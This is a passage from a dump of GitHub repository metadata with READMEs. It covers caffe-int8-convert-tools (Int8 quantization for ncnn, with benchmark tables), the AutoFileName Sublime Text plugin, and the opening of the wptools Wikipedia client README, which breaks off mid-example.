In addition to the supplementary files needed for\nexamples in the book, this repository contains:\n\n - Documentation on how all supplementary files were produced or how they were\n acquired.\n\n - Additional information readers may find interesting for each chapter. These\n are the `README.md` files in each chapter's directory. I've also included\n other resources like lists of recommended books for further learning.\n\n - Errata, and any necessary updates if materials become outdated for some\n reason.\n\nAlthough I've made an strong, strong effort to focus on the subset of\nbioinformatics tools that will not go out of date is this rapidly changing\nfield, if certain tools do become obsolete I will use this repository to host\nand describe alternatives.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "BUG1989/caffe-int8-convert-tools", "link": "https://github.com/BUG1989/caffe-int8-convert-tools", "tags": ["quantized-neural-networks", "ncnn", "int8-inference", "caffe", "deeplearning-ai"], "stars": 511, "description": "Generate a quantization parameter file for ncnn framework int8 inference", "lang": "Python", "repo_lang": "", "readme": "# Caffe-Int8-Convert-Tools\n\nThis convert tools is base on TensorRT 2.0 Int8 calibration tools, which use the KL algorithm to find the suitable threshold to quantize the activions from Float32 to Int8(-127 - 127).\n\nWe provide the Classification(SqueezeNet_v1.1) and Detection(MobileNet_v1 SSD 300) demo based on [ncnn](https://github.com/Tencent/ncnn)(a high-performance neural network inference framework optimized for the mobile platform) and the community ready to support this implementation.\n\n[The pull request in ncnn](https://github.com/Tencent/ncnn/pull/749)\n\n## NCNN have a new convert tool to support Post-Training-Quantization \n\nUsing this new [ncnn-quantization-tools](https://github.com/Tencent/ncnn/tree/master/tools/quantize), you can convert your ncnn model to ncnn int8 model directly. If you just want to deploy your model with ncnn,I suggest you use it.\n\n## Reference\n\nFor details, please read the following PDF:\n\n[8-bit Inference with TensorRT](http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf) \n\nMXNet quantization implementation:\n\n[Quantization module for generating quantized (INT8) models from FP32 models](https://github.com/apache/incubator-mxnet/blob/master/python/mxnet/contrib/quantization.py)\n\nAn introduction to the principles of a Chinese blog written by my friend([bruce.zhang](https://github.com/bigbigzxl)):\n\n[The implement of Int8 quantize base on TensorRT](https://zhuanlan.zhihu.com/zhangxiaolongOptimization)\n\n## HowTo\n\nThe purpose of this tool(caffe-int8-convert-tool-dev.py) is to test new features, such as mulit-channels quantization depend on group num.\n\nThis format is already supported in the [ncnn](https://github.com/Tencent/ncnn) latest version. 
I will do my best to transform some common network models into [classification-dev](https://github.com/BUG1989/caffe-int8-convert-tools/tree/master/classification-dev)\n\n```\npython caffe-int8-convert-tool-dev-weight.py -h\nusage: caffe-int8-convert-tool-dev-weight.py [-h] [--proto PROTO] [--model MODEL]\n [--mean MEAN MEAN MEAN] [--norm NORM]\n [--images IMAGES] [--output OUTPUT]\n [--group GROUP] [--gpu GPU]\n\nfind the pretrained caffemodel int8 quantize scale value\n\noptional arguments:\n -h, --help show this help message and exit\n --proto PROTO path to deploy prototxt.\n --model MODEL path to pretrained caffemodel\n --mean MEAN value of mean\n --norm NORM value of normalize(scale value or std value)\n --images IMAGES path to calibration images\n --output OUTPUT path to output calibration table file\n --group GROUP enable the group scale(0:disable,1:enable,default:1)\n --gpu GPU use gpu to forward(0:disable,1:enable,default:0)\npython caffe-int8-convert-tool-dev-weight.py --proto=test/models/mobilenet_v1.prototxt --model=test/models/mobilenet_v1.caffemodel --mean 103.94 116.78 123.68 --norm=0.017 --images=test/images/ output=mobilenet_v1.table --group=1 --gpu=1\n```\n\n### How to use the output file(calibration-dev.table)\n\nFor\u00a0example in *MobileNet_v1_dev.table*\n\n```\nconv1_param_0 0.0 3779.48337933 482.140562772 1696.53814502\nconv2_1/dw_param_0 0 72.129143 149.919382 // the convdw layer's weight scale every group is 0.0 72.129 149.919 ......\n......\nconv1 49.466518\nconv2_1/dw 123.720796 // the convdw layer's bottom blobchannel scale is 123.720\n......\n```\n\nThree steps to implement the *conv1* layer int8 convolution:\n\n1. Quantize the bottom_blob and weight:\n\n ```\n bottom_blob_int8 = bottom_blob_float32 * data_scale(49.466518)\n weight_int8 = weight_float32 * weight_scale(156.639840)\n ```\n\n2. Convolution_Int8:\n\n ```\n top_blob_int32 = bottom_blob_int8 * weight_int8\n ```\n\n3. 
Dequantize the TopBlob_Int32 and add the bias:\n\n ```\n top_blob_float32 = top_blob_int32 / [data_scale(49.466518) * weight_scale(156.639840)] + bias_float32\n ```\n\n## How to use with ncnn\n\n[quantized int8 inference](https://github.com/Tencent/ncnn/wiki/quantized-int8-inference#caffe-int8-convert-tools)\n\n## Accuracy and Performance\n\n#### We use ImageNet2012 Dataset to complete some classification test.\n\n| Type | Detail |\n| ------------------- | ----------------------------------------------------- |\n| Calibration Dataset | ILSVRC2012_img_test\u00a0 \u00a01k |\n| Test Dataset | ILSVRC2012_img_val\u00a0 \u00a0 5k |\n| Framework | ncnn |\n| Support Layer | Convolution,ConvolutionDepthwise,ReLU |\n\nThe following table show the Top1 and Top5 different between Float32 and Int8 inference.\n\n| Models | FP32 | | INT8 | | Loss | |\n| --------------- | ------ | ------ | ------ | ------ | --------- | --------- |\n| | Top1 | Top5 | Top1 | Top5 | Diff Top1 | Diff Top5 |\n| SqueezeNet v1.1 | 57.78% | 79.88% | 57.82% | 79.84% | +0.04% | -0.04% |\n| MobileNet v1 | 67.26% | 87.92% | 66.74% | 87.43% | -0.52% | -0.49% |\n| GoogleNet | 68.50% | 88.84% | 68.62% | 88.68% | +0.12% | -0.16% |\n| ResNet18 | 65.49% | 86.56% | 65.30% | 86.52% | -0.19% | -0.04% |\n| ResNet50 | 71.80% | 89.90% | 71.76% | 90.06% | -0.04% | +0.16% |\n\n#### We use VOC0712,MSCOCO Dataset to complete some detection test.\n\n| Type | Detail |\n| ------------ | -------------- |\n| Test Dataset | VOC2007 |\n| Unit | mAP (Class 20) |\n\n| Models | FP32 | INT8 | Loss |\n| ---------------- | ----- | ----- | ------ |\n| SqueezeNet SSD | 61.80 | 61.27 | -0.53 |\n| MobileNet_v1 SSD | 70.49 | 68.92 | -1.57 |\n\n#### Speed up\n\nThe following table show the speedup between Float32 and Int8 inference. It should be noted that the winograd algorithm is enable in the Float32 and Int8 inference. 
The Hardware Platform is Hisi3519(Cortex-A17@880MHz)\n\n| Uint(ms) | SqueezeNet v1.1 | MobileNet v1 | GoogleNet | ResNet18 | MobileNetv1 SSD | SqueezeNet SSD |\n| -------- | --------------- | ------------ | --------- | -------- | --------------- | -------------- |\n| Float32 | 282 | 490 | 1107 | 985 | 970 | 610 |\n| Int8 | 192 | 369 | 696 | 531 | 605 | 498 |\n| Ratio | x1.46 | x1.33 | x1.59 | x1.85 | x1.60 | x1.22 |\n\n#### Memory reduce\n\nRuntime Memory : mbytes\n\n| Models | fp32-wino63 | int8-wino23 | int8-wino43 |\n| ----------------- | ----------- | ----------- | ----------- |\n| squeezenet_v1_1 | 50 | 30 | 32 |\n| mobilenet_v1 | 61 | 35 | 35 |\n| mobilenet_v1_ssd | 90 | 45 | 45 |\n| squeezenet_v1_ssd | 210 | 70 | 94 |\n| resnet18 | 335 | 77 | 130 |\n| googlenet_v1 | 154 | 72 | 89 |\n\nStorage Memory : mbytes\n\n| Models | fp32 | int8 |\n| ----------------- | ---- | ---- |\n| squeezenet_v1_1 | 4.71 | 1.20 |\n| mobilenet_v1 | 16.3 | 4.31 |\n| mobilenet_v1_ssd | 22.0 | 5.60 |\n| squeezenet_v1_ssd | 21.1 | 5.37 |\n| resnet18 | 44.6 | 11.2 |\n| googlenet_v1 | 26.6 | 6.72 |\n\n## Contributor\n\nThanks to NVIDIA for providing the principle of correlation entropy and ncnn's author [nihui](https://github.com/nihui) sharing his neural network inference framework.\n\nThanks to the help from the following friends:\n\nOptimization Instructor : [Fugangping](https://github.com/fu1899), [bruce.zhang](https://github.com/bigbigzxl)\n\nAlgorithm : [xupengfeixupf](https://github.com/xupengfeixupf), [JansonZhu](https://github.com/JansonZhu), [wangxinwei](https://github.com/StarStyleSky), [lengmm](https://github.com/lengmm) \n\nPython : [daquexian](https://github.com/daquexian)\n\n## License\n\nBSD 3 Clause\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liamcain/AutoFileName", "link": "https://github.com/liamcain/AutoFileName", "tags": [], "stars": 511, "description": "Sublime Text plugin that autocompletes filenames", "lang": "Python", "repo_lang": "", "readme": "AutoFileName: Autocomplete Filenames in Sublime Text\n=====================================================\nDo you ever find yourself sifting through folders in the sidebar trying to remember what you named that file? Can't remember if it was a jpg or a png? Maybe you just wish you could type filenames faster. *No more.*\n\nWhether your making a `img` tag in html, setting a background image in css, or linking a `.js` file to your html (or whatever else people use filename paths for these days...), you can now autocomplete the filename. Plus, it uses the built-in autocomplete, so no need to learn another *pesky* shortcut.\n\nUsage\n=====\nIf you are looking to autocomplete an image path in an HTML `` tag:\n```html\n \n```\n\nPressing ctrl+space, will activate AutoFileName. 
A list of available files will be ready for you to select.\n\n*Looking for an even more automatic and seamless completion?* Add the following to your User Settings file:\n \n \"auto_complete_triggers\":\n [\n {\n \"characters\": \"<\",\n \"selector\": \"text.html\"\n },\n {\n \"characters\": \"/\",\n \"selector\": \"string.quoted.double.html,string.quoted.single.html, source.css\"\n }\n ]\n\nWith this, there's no need to worry about pressing ctrl+space; autocompletion will appear as soon as you press /.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "siznax/wptools", "link": "https://github.com/siznax/wptools", "tags": ["mediawiki", "mediawiki-api", "restbase", "wikidata", "open-data", "glam", "commons", "linked-open-data", "wikimedia-commons", "wikipedia", "wikipedia-api", "api-client", "python", "data-science"], "stars": 511, "description": "Wikipedia tools (for Humans): easily extract data from Wikipedia, Wikidata, and other MediaWikis", "lang": "Python", "repo_lang": "", "readme": "Wikipedia tools (for Humans)\n============================\n\n.. image:: https://img.shields.io/pypi/v/wptools.svg\n :target: https://pypi.python.org/pypi/wptools/\n\n.. image:: https://travis-ci.org/siznax/wptools.svg?branch=master\n :target: https://travis-ci.org/siznax/wptools\n\n.. image:: https://coveralls.io/repos/github/siznax/wptools/badge.svg?branch=master\n :target: https://coveralls.io/github/siznax/wptools\n\nPython and command-line MediaWiki access for Humans\n\n- get page extracts, image, Infobox data, Wikidata, and more\n- get a random page, category, or site\n- get page statistics\n- get category members\n- get site info and stats\n- get data in any language\n\nThis package is intended to make it as easy as possible to get data\nfrom MediaWiki instances, expose more Wikidata, and extend Wikimedia\nAPIs just for kicks. We say \"(for Humans)\" because that is a goal_.\nQuestions, feedback, and especially contributions_ are welcome!\n\n\nInstall\n-------\n\n.. code-block:: bash\n\n $ pip install wptools\n \u2728\ud83e\udd84\u2728\n\n\nExample\n-------\n\n.. code-block:: python\n\n >>> import wptools\n\n\nGet a page object:\n\n.. code-block:: python\n\n >>> page = wptools.page('Gandhi')\n\n\nGet `API:Query`_ data:\n\n.. _`API:Query`: https://www.mediawiki.org/wiki/API:Query\n\n.. code-block:: python\n\n >>> page.get_query()\n en.wikipedia.org (query) Gandhi\n en.wikipedia.org (imageinfo) File:Portrait Gandhi.jpg\n Mahatma Gandhi (en) data\n {\n aliases: M K Gandhi, Mohandas Gandhi, Bapu, Gandhi, M...\n assessments: Pakistan, Alternative Views, South Afric...\n description: pre-eminent leader of Indian nationalism ...\n extext: Mah\u0101tm\u0101 **Mohandas Karamchand Gandhi** ( ; H...\n extract:
Mah\u0101tm\u0101 Mohandas Karamchand Gandhi ...\n image: {u'size': 2951123, 'kind': 'query-pageimage', u...\n label: Mahatma Gandhi\n length: 262,790\n links: 10 Janpath, 14th Dalai Lama, 1915 Singapore M...\n modified: page\n pageid: 19379\n random: Salt\n redirected: {u'to': u'Mahatma Gandhi', u'from': u'Gandhi'}\n redirects: {u'ns': 0, u'pageid': 55342, u'title': u'M...\n requests: query, imageinfo\n title: Mahatma Gandhi\n url: https://en.wikipedia.org/wiki/Mahatma_Gandhi\n url_raw: https://en.wikipedia.org/wiki/Mahatma_Gandhi?action=raw\n watchers: 1,811\n wikibase: Q1001\n wikidata_url: https://www.wikidata.org/wiki/Q1001\n }\n\n\nGet `API:Parse`_ data:\n\n.. _`API:Parse`: https://www.mediawiki.org/wiki/API:Parse\n\n.. code-block:: python\n\n >>> page.get_parse()\n en.wikipedia.org (parse) Gandhi\n en.wikipedia.org (imageinfo) File:MKGandhi.jpg\n Mahatma Gandhi (en) data\n {\n image: {u'size': 2951123, 'kind': 'parse-image', u'des...\n infobox: known_for, other_names, image, signature, bi...\n iwlinks: https://biblio.wiki/wiki/Mohandas_K._Gandhi,...\n pageid: 19379\n parsetree: